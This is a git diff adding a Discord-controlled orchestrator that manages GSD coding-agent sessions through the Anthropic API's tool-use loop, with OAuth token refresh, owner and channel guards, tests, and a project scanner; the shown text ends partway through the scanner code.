+      const msg = makeMessage({ content: 'stop big project' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(sessionManager.cancelSessionCalls.length, 1);
+      assert.equal(sessionManager.cancelSessionCalls[0], 'sess-xyz');
+    });
+
+    it('returns not-found for unmatched identifier', async () => {
+      const mockClient = new MockAnthropicClient(
+        MockAnthropicClient.toolThenTextHandler(
+          'stop_session',
+          { identifier: 'nonexistent' },
+          'No session found',
+        ),
+      );
+      const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient, sessions: [] });
+      const msg = makeMessage({ content: 'stop nonexistent' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(sessionManager.cancelSessionCalls.length, 0);
+    });
+  });
+
+  // ---- get_session_detail tool ----
+
+  describe('get_session_detail tool', () => {
+    it('returns formatted session detail', async () => {
+      const session = makeMockSession({ sessionId: 'sess-detail' });
+      const mockClient = new MockAnthropicClient(
+        MockAnthropicClient.toolThenTextHandler(
+          'get_session_detail',
+          { sessionId: 'sess-detail' },
+          'Session details for my-project',
+        ),
+      );
+      const { orchestrator } = makeOrchestrator({ client: mockClient, sessions: [session] });
+      const msg = makeMessage({ content: 'detail sess-detail' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(msg.sentMessages[0], 'Session details for my-project');
+    });
+  });
+
+  // ---- Message routing / auth guards ----
+
+  describe('handleMessage routing', () => {
+    it('ignores bot messages', async () => {
+      const { orchestrator, mockClient } = makeOrchestrator();
+      const msg = makeMessage({ bot: true, content: 'hello from bot' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(mockClient.createCallCount, 0);
+      assert.equal(msg.sentMessages.length, 0);
+    });
+
+    it('ignores non-owner messages', async () => {
+      const { orchestrator, mockClient } = makeOrchestrator();
+      const msg = makeMessage({ authorId: 'stranger-456', content: 'hack the planet' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(mockClient.createCallCount, 0);
+      assert.equal(msg.sentMessages.length, 0);
+    });
+
+    it('ignores messages from non-control channels', async () => {
+      const { orchestrator, mockClient } = makeOrchestrator();
+      const msg = makeMessage({ channelId: 'random-channel', content: 'hello' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(mockClient.createCallCount, 0);
+      assert.equal(msg.sentMessages.length, 0);
+    });
+
+    it('ignores empty message content', async () => {
+      const { orchestrator, mockClient } = makeOrchestrator();
+      const msg = makeMessage({ content: '   ' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(mockClient.createCallCount, 0);
+    });
+
+    it('routes valid message through LLM and sends response', async () => {
+      const { orchestrator, mockClient } = makeOrchestrator();
+      const msg = makeMessage({ content: 'hello orchestrator' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(mockClient.createCallCount, 1);
+      assert.equal(msg.sentMessages.length, 1);
+      assert.equal(msg.sentMessages[0], 'Mock LLM response');
+    });
+  });
+
+  // ---- Conversation history ----
+
+  describe('conversation history', () => {
+    it('accumulates user and assistant entries', async () => {
+      const { orchestrator } = makeOrchestrator();
+
+      await orchestrator.handleMessage(makeMessage({ content: 'first' }));
+      await orchestrator.handleMessage(makeMessage({ content: 'second' }));
+
+      const history = orchestrator.getHistory();
+      assert.equal(history.length, 4); // 2 user + 2 assistant
+      assert.equal(history[0]!.role, 'user');
+      assert.equal(history[1]!.role, 'assistant');
+      assert.equal(history[2]!.role, 'user');
+      assert.equal(history[3]!.role, 'assistant');
+    });
+
+    it('trims to MAX_HISTORY (30) by removing oldest pairs', async () => {
+      const { orchestrator } = makeOrchestrator();
+
+      // Send 17 messages → 34 history entries (17 user + 17 assistant)
+      // After trimming: should be ≤30
+      for (let i = 0; i < 17; i++) {
+        await orchestrator.handleMessage(makeMessage({ content: `msg-${i}` }));
+      }
+
+      const history = orchestrator.getHistory();
+      assert.ok(history.length <= 30, `History length ${history.length} exceeds 30`);
+      // Should have trimmed from the front — oldest entries gone
+      // 34 entries → trim 2 at a time until ≤30 → 30 entries (trimmed 4)
+      assert.equal(history.length, 30);
+    });
+  });
+
+  // ---- Error handling ----
+
+  describe('error handling', () => {
+    it('sends error message to Discord when LLM API throws', async () => {
+      const mockClient = new MockAnthropicClient(
+        MockAnthropicClient.errorHandler('API rate limit exceeded'),
+      );
+      const { orchestrator } = makeOrchestrator({ client: mockClient });
+      const msg = makeMessage({ content: 'hello' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(msg.sentMessages.length, 1);
+      assert.ok(msg.sentMessages[0]!.includes('Something went wrong'));
+    });
+
+    it('appends error placeholder to history on LLM failure', async () => {
+      const mockClient = new MockAnthropicClient(
+        MockAnthropicClient.errorHandler('Network error'),
+      );
+      const { orchestrator } = makeOrchestrator({ client: mockClient });
+      await orchestrator.handleMessage(makeMessage({ content: 'fail' }));
+
+      const history = orchestrator.getHistory();
+      assert.equal(history.length, 2); // user + error assistant
+      assert.equal(history[1]!.role, 'assistant');
+      assert.equal(history[1]!.content, '[error — see logs]');
+    });
+  });
+
+  // ---- stop() ----
+
+  describe('stop()', () => {
+    it('clears conversation history and nulls client', async () => {
+      const { orchestrator } = makeOrchestrator();
+
+      await orchestrator.handleMessage(makeMessage({ content: 'hello' }));
+      assert.ok(orchestrator.getHistory().length > 0);
+
+      orchestrator.stop();
+      assert.equal(orchestrator.getHistory().length, 0);
+    });
+  });
+
+  // ---- Tool execution direct tests ----
+
+  describe('tool execution (via agent loop)', () => {
+    it('list_projects returns empty message when no projects', async () => {
+      const mockClient = new MockAnthropicClient(
+        MockAnthropicClient.toolThenTextHandler('list_projects', {}, 'No projects'),
+      );
+      const { orchestrator } = makeOrchestrator({ client: mockClient, projects: [] });
+      const msg = makeMessage({ content: 'list' });
+      await orchestrator.handleMessage(msg);
+
+      // The second create call receives the tool result
+      assert.equal(mockClient.createCallCount, 2);
+    });
+
+    it('start_session with optional command passes through', async () => {
+      const mockClient = new MockAnthropicClient(
+        MockAnthropicClient.toolThenTextHandler(
+          'start_session',
+          { projectPath: '/p', command: '/gsd quick fix tests' },
+          'Started',
+        ),
+      );
+      const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient });
+      const msg = makeMessage({ content: 'start with custom command' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(sessionManager.startSessionCalls.length, 1);
+      assert.equal(sessionManager.startSessionCalls[0]!.command, '/gsd quick fix tests');
+    });
+  });
+
+});
diff --git a/packages/daemon/src/orchestrator.ts b/packages/daemon/src/orchestrator.ts
new file mode 100644
index 000000000..678874cec
--- /dev/null
+++ b/packages/daemon/src/orchestrator.ts
@@ -0,0 +1,544 @@
+/**
+ * Orchestrator — LLM-powered agent for the #gsd-control Discord channel.
+ *
+ * Receives Discord messages, maintains conversation history, calls the
+ * Anthropic messages API with 5 tool definitions (list_projects, start_session,
+ * get_status, stop_session, get_session_detail), and sends the LLM's response
+ * back to Discord.
+ *
+ * Uses the standard messages.create() tool-use loop (not betaZodTool helpers,
+ * which don't exist in SDK v0.52). Zod schemas are used for input validation
+ * at the tool execution layer.
+ */
+
+import { z } from 'zod';
+import { readFileSync, writeFileSync, chmodSync } from 'node:fs';
+import { join } from 'node:path';
+import { homedir } from 'node:os';
+import type Anthropic from '@anthropic-ai/sdk';
+import type {
+  MessageParam,
+  ContentBlockParam,
+  Tool,
+  ToolResultBlockParam,
+  ToolUseBlock,
+  TextBlock,
+} from '@anthropic-ai/sdk/resources/messages/messages';
+import type { SessionManager } from './session-manager.js';
+import type { ChannelManager } from './channel-manager.js';
+import type { ProjectInfo, ManagedSession } from './types.js';
+import type { Logger } from './logger.js';
+
+// ---------------------------------------------------------------------------
+// OAuth token resolution — reads GSD's auth.json, refreshes if expired
+// ---------------------------------------------------------------------------
+
+interface OAuthCredentials {
+  type: 'oauth';
+  refresh: string;
+  access: string;
+  expires: number;
+}
+
+const TOKEN_URL = 'https://platform.claude.com/v1/oauth/token';
+const CLIENT_ID = atob('OWQxYzI1MGEtZTYxYi00NGQ5LTg4ZWQtNTk0NGQxOTYyZjVl');
+
+/**
+ * Read the Anthropic OAuth access token from GSD's auth.json.
+ * If expired, refresh it and write the new credentials back.
+ * Falls back to ANTHROPIC_API_KEY env var if no OAuth credential exists.
+ */
+async function resolveAnthropicApiKey(logger?: Logger): Promise<string> {
+  // Try env var first (explicit override)
+  if (process.env.ANTHROPIC_API_KEY) {
+    return process.env.ANTHROPIC_API_KEY;
+  }
+
+  const authPath = join(homedir(), '.gsd', 'agent', 'auth.json');
+  let authData: Record<string, unknown>;
+  try {
+    authData = JSON.parse(readFileSync(authPath, 'utf-8'));
+  } catch {
+    throw new Error(
+      'No Anthropic auth found. Run `gsd login` to authenticate, or set ANTHROPIC_API_KEY.',
+    );
+  }
+
+  const cred = authData.anthropic as OAuthCredentials | undefined;
+  if (!cred || cred.type !== 'oauth' || !cred.access) {
+    throw new Error(
+      'No Anthropic OAuth credential in auth.json. Run `gsd login` to authenticate.',
+    );
+  }
+
+  // If token is still valid, use it
+  if (Date.now() < cred.expires) {
+    return cred.access;
+  }
+
+  // Token expired — refresh it
+  logger?.info('orchestrator: refreshing Anthropic OAuth token');
+  const response = await fetch(TOKEN_URL, {
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json' },
+    body: JSON.stringify({
+      grant_type: 'refresh_token',
+      client_id: CLIENT_ID,
+      refresh_token: cred.refresh,
+    }),
+    signal: AbortSignal.timeout(30_000),
+  });
+
+  if (!response.ok) {
+    const error = await response.text();
+    throw new Error(`Anthropic token refresh failed: ${error}`);
+  }
+
+  const data = (await response.json()) as {
+    access_token: string;
+    refresh_token: string;
+    expires_in: number;
+  };
+
+  const newCred: OAuthCredentials = {
+    type: 'oauth',
+    refresh: data.refresh_token,
+    access: data.access_token,
+    expires: Date.now() + data.expires_in * 1000 - 5 * 60 * 1000,
+  };
+
+  // Write back to auth.json
+  authData.anthropic = newCred;
+  writeFileSync(authPath, JSON.stringify(authData, null, 2), 'utf-8');
+  chmodSync(authPath, 0o600);
+  logger?.info('orchestrator: Anthropic OAuth token refreshed');
+
+  return newCred.access;
+}
+
+// ---------------------------------------------------------------------------
+// Configuration
+// ---------------------------------------------------------------------------
+
+export interface OrchestratorConfig {
+  model: string;
+  max_tokens: number;
+  control_channel_id: string;
+}
+
+export interface OrchestratorDeps {
+  sessionManager: SessionManager;
+  channelManager: ChannelManager;
+  scanProjects: () => Promise<ProjectInfo[]>;
+  config: OrchestratorConfig;
+  logger: Logger;
+  ownerId: string;
+}
+
+// ---------------------------------------------------------------------------
+// System Prompt
+// ---------------------------------------------------------------------------
+
+const SYSTEM_PROMPT = `You are GSD Control — a concise, capable orchestrator for managing GSD (Get Shit Done) coding agent sessions via Discord.
+
+You have tools to list projects, start sessions, get status, stop sessions, and inspect session details. Use them to fulfill the user's requests.
+
+Response guidelines:
+- Be terse and direct. No filler, no performed enthusiasm.
+- When reporting status, use bullet points with project name, status, duration, and cost.
+- When starting a session, confirm with the project name and session ID.
+- When stopping a session, confirm which session was stopped.
+- If something fails, say what went wrong plainly.
+- Use Discord markdown formatting (bold, code blocks) for readability.
+- Never expose internal error stack traces to the user — summarize the issue.`;
+
+// ---------------------------------------------------------------------------
+// Tool Definitions (Anthropic API format)
+// ---------------------------------------------------------------------------
+
+const TOOLS: Tool[] = [
+  {
+    name: 'list_projects',
+    description: 'List all detected projects across configured scan roots. Returns project names, paths, and detected markers (git, node, gsd, etc.).',
+    input_schema: {
+      type: 'object' as const,
+      properties: {},
+      required: [],
+    },
+  },
+  {
+    name: 'start_session',
+    description: 'Start a new GSD auto-mode session for a project. Provide the absolute project path. Optionally provide a command to run instead of the default "/gsd auto".',
+    input_schema: {
+      type: 'object' as const,
+      properties: {
+        projectPath: { type: 'string', description: 'Absolute path to the project directory' },
+        command: { type: 'string', description: 'Optional command to send instead of "/gsd auto"' },
+      },
+      required: ['projectPath'],
+    },
+  },
+  {
+    name: 'get_status',
+    description: 'Get the current status of all active GSD sessions. Shows project name, status, duration, and cost for each.',
+    input_schema: {
+      type: 'object' as const,
+      properties: {},
+      required: [],
+    },
+  },
+  {
+    name: 'stop_session',
+    description: 'Stop a running GSD session. Provide a session ID or project name — fuzzy matching is used to find the session.',
+    input_schema: {
+      type: 'object' as const,
+      properties: {
+        identifier: { type: 'string', description: 'Session ID or project name to match' },
+      },
+      required: ['identifier'],
+    },
+  },
+  {
+    name: 'get_session_detail',
+    description: 'Get detailed information about a specific session including cost breakdown, recent events, pending blockers, and error state.',
+    input_schema: {
+      type: 'object' as const,
+      properties: {
+        sessionId: { type: 'string', description: 'The session ID to inspect' },
+      },
+      required: ['sessionId'],
+    },
+  },
+];
+
+// ---------------------------------------------------------------------------
+// Zod schemas for tool input validation
+// ---------------------------------------------------------------------------
+
+const StartSessionInput = z.object({
+  projectPath: z.string(),
+  command: z.string().optional(),
+});
+
+const StopSessionInput = z.object({
+  identifier: z.string(),
+});
+
+const GetSessionDetailInput = z.object({
+  sessionId: z.string(),
+});
+
+// ---------------------------------------------------------------------------
+// Conversation History Cap
+// ---------------------------------------------------------------------------
+
+const MAX_HISTORY = 30;
+
+// ---------------------------------------------------------------------------
+// Orchestrator
+// ---------------------------------------------------------------------------
+
+export class Orchestrator {
+  private readonly deps: OrchestratorDeps;
+  private client: Anthropic | null;
+  private history: MessageParam[] = [];
+
+  /**
+   * @param deps - orchestrator dependencies (session manager, channel manager, etc.)
+   * @param client - optional Anthropic client for testability; if omitted, created from env
+   */
+  constructor(deps: OrchestratorDeps, client?: Anthropic) {
+    this.deps = deps;
+    this.client = client ?? null;
+  }
+
+  /**
+   * Lazily initialise the Anthropic client. Dynamic import handles K007 module resolution.
+   * Resolves auth from GSD's OAuth credentials (auth.json), refreshing if needed.
+   */
+  private async getClient(): Promise<Anthropic> {
+    if (this.client) return this.client;
+    const apiKey = await resolveAnthropicApiKey(this.deps.logger);
+    const { default: AnthropicSDK } = await import('@anthropic-ai/sdk');
+    this.client = new AnthropicSDK({ apiKey });
+    return this.client;
+  }
+
+  /**
+   * Handle an incoming Discord message. Entry point called by the bot's
+   * message handler for every message in every channel.
+   *
+   * Guards: ignores bot messages, non-owner messages, and non-control-channel messages.
+   */
+  async handleMessage(message: DiscordMessageLike): Promise<void> {
+    // Ignore bot messages
+    if (message.author.bot) return;
+
+    // Ignore non-control-channel messages
+    if (message.channelId !== this.deps.config.control_channel_id) return;
+
+    // Auth guard — only the owner can use the orchestrator
+    if (message.author.id !== this.deps.ownerId) {
+      this.deps.logger.debug('orchestrator auth rejected', { userId: message.author.id });
+      return;
+    }
+
+    const content = message.content?.trim();
+    if (!content) return;
+
+    this.deps.logger.info('orchestrator message received', {
+      userId: message.author.id,
+      channelId: message.channelId,
+      contentLength: content.length,
+    });
+
+    // Append user message to history
+    this.history.push({ role: 'user', content });
+
+    try {
+      // Show typing indicator while processing
+      await message.channel.sendTyping().catch(() => {});
+
+      const responseText = await this.runAgentLoop();
+
+      // Send response to Discord
+      await message.channel.send(responseText);
+
+      this.deps.logger.info('orchestrator response sent', {
+        channelId: message.channelId,
+        responseLength: responseText.length,
+      });
+    } catch (err) {
+      const errorMsg = err instanceof Error ? err.message : String(err);
+
+      // Invalidate cached client on auth errors so next call re-resolves OAuth token
+      if (errorMsg.includes('authentication') || errorMsg.includes('apiKey') || errorMsg.includes('authToken') || errorMsg.includes('401')) {
+        this.client = null;
+      }
+
+      this.deps.logger.error('orchestrator error', {
+        error: errorMsg,
+        userId: message.author.id,
+        channelId: message.channelId,
+      });
+
+      // Send error feedback to Discord
+      try {
+        await message.channel.send('⚠️ Something went wrong processing your request.');
+      } catch (sendErr) {
+        this.deps.logger.warn('orchestrator error reply failed', {
+          error: sendErr instanceof Error ? sendErr.message : String(sendErr),
+        });
+      }
+
+      // Still append a synthetic assistant message so history stays paired
+      this.history.push({ role: 'assistant', content: '[error — see logs]' });
+    }
+
+    this.trimHistory();
+  }
+
+  /**
+   * Run the tool-use loop: call messages.create(), execute any tool calls,
+   * feed results back, repeat until the model produces a final text response.
+   */
+  private async runAgentLoop(): Promise<string> {
+    const client = await this.getClient();
+    const { model, max_tokens } = this.deps.config;
+
+    let loopMessages: MessageParam[] = [...this.history];
+    const maxIterations = 10; // safety valve
+
+    for (let i = 0; i < maxIterations; i++) {
+      const response = await client.messages.create({
+        model,
+        max_tokens,
+        system: SYSTEM_PROMPT,
+        tools: TOOLS,
+        messages: loopMessages,
+      });
+
+      // If the model stopped for end_turn (no tool calls), extract text and return
+      if (response.stop_reason === 'end_turn' || response.stop_reason !== 'tool_use') {
+        const textBlocks = response.content.filter(
+          (b): b is TextBlock => b.type === 'text',
+        );
+        const finalText = textBlocks.map((b) => b.text).join('\n') || '(No response)';
+
+        // Append assistant message to conversation history
+        this.history.push({ role: 'assistant', content: finalText });
+
+        return finalText;
+      }
+
+      // Model wants to use tools — execute them all
+      const toolUseBlocks = response.content.filter(
+        (b): b is ToolUseBlock => b.type === 'tool_use',
+      );
+
+      // Build tool results
+      const toolResults: ToolResultBlockParam[] = [];
+      for (const toolUse of toolUseBlocks) {
+        const result = await this.executeTool(toolUse.name, toolUse.input as Record<string, unknown>);
+        toolResults.push({
+          type: 'tool_result',
+          tool_use_id: toolUse.id,
+          content: result,
+        });
+      }
+
+      // Append the assistant message (with tool_use blocks) and user tool_result message
+      loopMessages = [
+        ...loopMessages,
+        { role: 'assistant', content: response.content as ContentBlockParam[] },
+        { role: 'user', content: toolResults },
+      ];
+    }
+
+    // If we hit max iterations, return a fallback
+    return 'I hit the maximum number of tool iterations. Please try a simpler request.';
+  }
+
+  /**
+   * Execute a single tool by name. Returns a string result for the LLM.
+   * All errors are caught and returned as error strings (the LLM can reason about them).
+   */
+  private async executeTool(name: string, input: Record<string, unknown>): Promise<string> {
+    try {
+      switch (name) {
+        case 'list_projects':
+          return await this.toolListProjects();
+        case 'start_session':
+          return await this.toolStartSession(input);
+        case 'get_status':
+          return this.toolGetStatus();
+        case 'get_session_detail':
+          return this.toolGetSessionDetail(input);
+        case 'stop_session':
+          return await this.toolStopSession(input);
+        default:
+          return `Unknown tool: ${name}`;
+      }
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      this.deps.logger.error('tool execution error', { tool: name, error: msg });
+      return `Error: ${msg}`;
+    }
+  }
+
+  // ---------------------------------------------------------------------------
+  // Tool implementations
+  // ---------------------------------------------------------------------------
+
+  private async toolListProjects(): Promise<string> {
+    const projects = await this.deps.scanProjects();
+    if (projects.length === 0) return 'No projects found.';
+    return JSON.stringify(
+      projects.map((p) => ({ name: p.name, path: p.path, markers: p.markers })),
+      null,
+      2,
+    );
+  }
+
+  private async toolStartSession(input: Record<string, unknown>): Promise<string> {
+    const parsed = StartSessionInput.parse(input);
+    const sessionId = await this.deps.sessionManager.startSession({
+      projectDir: parsed.projectPath,
+      command: parsed.command,
+    });
+    return `Session started: ${sessionId} for ${parsed.projectPath}`;
+  }
+
+  private toolGetStatus(): string {
+    const sessions = this.deps.sessionManager.getAllSessions();
+    if (sessions.length === 0) return 'No active sessions.';
+
+    return sessions
+      .map((s: ManagedSession) => {
+        const durationMin = Math.floor((Date.now() - s.startTime) / 60_000);
+        const cost = s.cost.totalCost.toFixed(4);
+        return `• ${s.projectName} — ${s.status} (${durationMin}m, $${cost})`;
+      })
+      .join('\n');
+  }
+
+  private async toolStopSession(input: Record<string, unknown>): Promise<string> {
+    const parsed = StopSessionInput.parse(input);
+    const { identifier } = parsed;
+
+    // Try exact sessionId match first
+    const byId = this.deps.sessionManager.getSession(identifier);
+    if (byId) {
+      await this.deps.sessionManager.cancelSession(identifier);
+      return `Stopped session ${identifier} (${byId.projectName})`;
+    }
+
+    // Fuzzy match by project name
+    const all = this.deps.sessionManager.getAllSessions();
+    const match = all.find(
+      (s: ManagedSession) =>
+        s.projectName.toLowerCase().includes(identifier.toLowerCase()) ||
+        s.projectDir.toLowerCase().includes(identifier.toLowerCase()),
+    );
+    if (match) {
+      await this.deps.sessionManager.cancelSession(match.sessionId);
+      return `Stopped session ${match.sessionId} (${match.projectName})`;
+    }
+
+    return `No session found matching "${identifier}"`;
+  }
+
+  private toolGetSessionDetail(input: Record<string, unknown>): string {
+    const parsed = GetSessionDetailInput.parse(input);
+    const result = this.deps.sessionManager.getResult(parsed.sessionId);
+    return JSON.stringify(result, null, 2);
+  }
+
+  // ---------------------------------------------------------------------------
+  // History management
+  // ---------------------------------------------------------------------------
+
+  /**
+   * Trim conversation history to MAX_HISTORY entries.
+   * Removes the oldest user+assistant pair from the front to keep pairs aligned.
+   */
+  private trimHistory(): void {
+    while (this.history.length > MAX_HISTORY) {
+      // Remove from front — two messages at a time to keep user/assistant pairs
+      this.history.splice(0, 2);
+    }
+  }
+
+  /**
+   * Return a copy of the conversation history (for debugging / observability).
+   */
+  getHistory(): MessageParam[] {
+    return [...this.history];
+  }
+
+  /**
+   * Stop the orchestrator — clears history and nulls client reference.
+   */
+  stop(): void {
+    this.history = [];
+    this.client = null;
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Discord message type (minimal interface for testability)
+// ---------------------------------------------------------------------------
+
+/**
+ * Minimal Discord message interface — avoids importing discord.js directly,
+ * making the orchestrator testable without full discord.js mocking.
+ */
+export interface DiscordMessageLike {
+  author: { id: string; bot: boolean };
+  channelId: string;
+  content: string;
+  channel: {
+    send: (content: string) => Promise<unknown>;
+    sendTyping: () => Promise<unknown>;
+  };
+}
diff --git a/packages/daemon/src/project-scanner.test.ts b/packages/daemon/src/project-scanner.test.ts
new file mode 100644
index 000000000..6812c3871
--- /dev/null
+++ b/packages/daemon/src/project-scanner.test.ts
@@ -0,0 +1,235 @@
+/**
+ * Tests for the project scanner module.
+ */
+
+import { describe, it, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, chmodSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir, platform } from 'node:os';
+import { randomUUID } from 'node:crypto';
+import { scanForProjects } from './project-scanner.js';
+
+// ---------- helpers ----------
+
+function tmpDir(): string {
+  return mkdtempSync(join(tmpdir(), `scanner-test-${randomUUID().slice(0, 8)}-`));
+}
+
+const cleanupDirs: string[] = [];
+afterEach(() => {
+  while (cleanupDirs.length) {
+    const d = cleanupDirs.pop()!;
+    if (existsSync(d)) rmSync(d, { recursive: true, force: true });
+  }
+});
+
+/** Create a project directory with specified marker files/dirs */
+function createProject(root: string, name: string, markers: string[]): string {
+  const projDir = join(root, name);
+  mkdirSync(projDir, { recursive: true });
+  for (const marker of markers) {
+    const markerPath = join(projDir, marker);
+    if (marker.startsWith('.') && !marker.includes('.')) {
+      // Likely a directory marker (.git, .gsd)
+      mkdirSync(markerPath, { recursive: true });
+    } else {
+      // File marker (package.json, Cargo.toml, etc.)
+      writeFileSync(markerPath, '{}');
+    }
+  }
+  return projDir;
+}
+
+// ---------- tests ----------
+
+describe('scanForProjects', () => {
+  it('finds projects with marker files', async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    createProject(root, 'my-app', ['.git', 'package.json']);
+
+    const results = await scanForProjects([root]);
+
+    assert.equal(results.length, 1);
+    assert.equal(results[0]!.name, 'my-app');
+    assert.equal(results[0]!.path, join(root, 'my-app'));
+    assert.ok(results[0]!.markers.includes('git'));
+    assert.ok(results[0]!.markers.includes('node'));
+    assert.ok(results[0]!.lastModified > 0);
+  });
+
+  it('handles missing scan_root gracefully', async () => {
+    const results = await scanForProjects(['/nonexistent/path/that/does/not/exist']);
+    assert.deepEqual(results, []);
+  });
+
+  it('handles permission errors on entries', { skip: platform() === 'win32' ? 'chmod not reliable on Windows' : undefined }, async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    // Create an accessible project
+    createProject(root, 'accessible', ['.git']);
+
+    // Create an inaccessible directory
+    const noAccess = join(root, 'locked');
+    mkdirSync(noAccess);
+    chmodSync(noAccess, 0o000);
+
+    const results = await scanForProjects([root]);
+
+    // Restore permissions for cleanup
+    chmodSync(noAccess, 0o755);
+
+    // Should find the accessible project but skip the locked one
+    assert.equal(results.length, 1);
+    assert.equal(results[0]!.name, 'accessible');
+  });
+
+  it('detects multiple marker types', async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    createProject(root, 'full-stack', ['.git', 'package.json', '.gsd']);
+
+    const results = await scanForProjects([root]);
+
+    assert.equal(results.length, 1);
+    assert.equal(results[0]!.markers.length, 3);
+    assert.ok(results[0]!.markers.includes('git'));
+    assert.ok(results[0]!.markers.includes('node'));
+    assert.ok(results[0]!.markers.includes('gsd'));
+  });
+
+  it('returns results sorted alphabetically by name', async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    createProject(root, 'zebra-project', ['.git']);
+    createProject(root, 'alpha-project', ['.git']);
+    createProject(root, 'middle-project', ['.git']);
+
+    const results = await scanForProjects([root]);
+
+    assert.equal(results.length, 3);
+    assert.equal(results[0]!.name, 'alpha-project');
+    assert.equal(results[1]!.name, 'middle-project');
+    assert.equal(results[2]!.name, 'zebra-project');
+  });
+
+  it('ignores hidden directories', async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    createProject(root, 'visible', ['.git']);
+    createProject(root, '.hidden', ['.git']);
+
+    const results = await scanForProjects([root]);
+
+    assert.equal(results.length, 1);
+    assert.equal(results[0]!.name, 'visible');
+  });
+
+  it('ignores node_modules', async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    createProject(root, 'real-project', ['package.json']);
+    createProject(root, 'node_modules', ['package.json']);
+
+    const results = await scanForProjects([root]);
+
+    assert.equal(results.length, 1);
+    assert.equal(results[0]!.name, 'real-project');
+  });
+
+  it('skips directories with no markers', async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    createProject(root, 'has-markers', ['.git']);
+    // Create a plain directory with no markers
+    mkdirSync(join(root, 'no-markers'));
+
+    const results = await scanForProjects([root]);
+
+    assert.equal(results.length, 1);
+    assert.equal(results[0]!.name, 'has-markers');
+  });
+
+  it('scans multiple roots', async () => {
+    const root1 = tmpDir();
+    const root2 = tmpDir();
+    cleanupDirs.push(root1, root2);
+
+    createProject(root1, 'proj-a', ['.git']);
+    createProject(root2, 'proj-b', ['Cargo.toml']);
+
+    const results = await scanForProjects([root1, root2]);
+
+    assert.equal(results.length, 2);
+    assert.equal(results[0]!.name, 'proj-a');
+    assert.ok(results[0]!.markers.includes('git'));
+    assert.equal(results[1]!.name, 'proj-b');
+    assert.ok(results[1]!.markers.includes('rust'));
+  });
+
+  it('detects all supported marker types', async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    createProject(root, 'git-proj', ['.git']);
+    createProject(root, 'node-proj', ['package.json']);
+    createProject(root, 'gsd-proj', ['.gsd']);
+    createProject(root, 'rust-proj', ['Cargo.toml']);
+    createProject(root, 'python-proj', ['pyproject.toml']);
+    createProject(root, 'go-proj', ['go.mod']);
+
+    const results = await scanForProjects([root]);
+
+    assert.equal(results.length, 6);
+
+    const byName = new Map(results.map(r => [r.name, r]));
+    assert.deepEqual(byName.get('git-proj')!.markers, ['git']);
+    assert.deepEqual(byName.get('node-proj')!.markers, ['node']);
+    assert.deepEqual(byName.get('gsd-proj')!.markers, ['gsd']);
+    assert.deepEqual(byName.get('rust-proj')!.markers, ['rust']);
+    assert.deepEqual(byName.get('python-proj')!.markers, ['python']);
+    assert.deepEqual(byName.get('go-proj')!.markers, ['go']);
+  });
+
+  it('skips non-directory entries', async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    createProject(root, 'real-project', ['.git']);
+    // Create a regular file at the root level — should be ignored
+    writeFileSync(join(root, 'some-file.txt'), 'not a directory');
+
+    const results = await scanForProjects([root]);
+
+    assert.equal(results.length, 1);
+    assert.equal(results[0]!.name, 'real-project');
+  });
+
+  it('returns empty array for empty scan_roots', async () => {
+    const results = await scanForProjects([]);
+    assert.deepEqual(results, []);
+  });
+
+  it('deduplicates when same root appears twice', async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    createProject(root, 'only-once', ['.git']);
+
+    const results = await scanForProjects([root, root]);
+
+    // Same directory scanned twice — results will have duplicates
+    // (this is acceptable; the caller can deduplicate by path if needed)
+    assert.equal(results.length, 2);
+    assert.equal(results[0]!.name, 'only-once');
+    assert.equal(results[1]!.name, 'only-once');
+  });
+});
diff --git a/packages/daemon/src/project-scanner.ts b/packages/daemon/src/project-scanner.ts
new file mode 100644
index 000000000..3eb9b5926
--- /dev/null
+++ b/packages/daemon/src/project-scanner.ts
@@ -0,0 +1,99 @@
+/**
+ * Project scanner — discovers projects in configured scan_roots by detecting
+ * marker files/directories. Reads one level deep (immediate children only).
+ */
+
+import { readdir, stat, access } from 'node:fs/promises';
+import { join, basename } from 'node:path';
+import type { ProjectInfo, ProjectMarker } from './types.js';
+
+// ---------------------------------------------------------------------------
+// Marker file → project type mapping
+// ---------------------------------------------------------------------------
+
+const MARKER_MAP: ReadonlyMap<string, ProjectMarker> = new Map([
+  ['.git', 'git'],
+  ['package.json', 'node'],
+  ['.gsd', 'gsd'],
+  ['Cargo.toml', 'rust'],
+  ['pyproject.toml', 'python'],
+  ['go.mod', 'go'],
+]);
+
+// ---------------------------------------------------------------------------
+// Public API
+// ---------------------------------------------------------------------------
+
+/**
+ * Scan configured roots for project directories.
+ *
+ * Behaviour:
+ * - Reads immediate children of each root (1 level deep, not recursive)
+ * - Skips hidden directories (starting with `.`) and `node_modules`
+ * - Skips missing roots and permission-denied entries gracefully
+ * - Detects markers via MARKER_MAP; directories with no markers are excluded
+ * - Results are sorted alphabetically by name
+ * - lastModified is the most recent mtime among detected marker files/dirs
+ */
+export async function scanForProjects(scanRoots: string[]): Promise<ProjectInfo[]> {
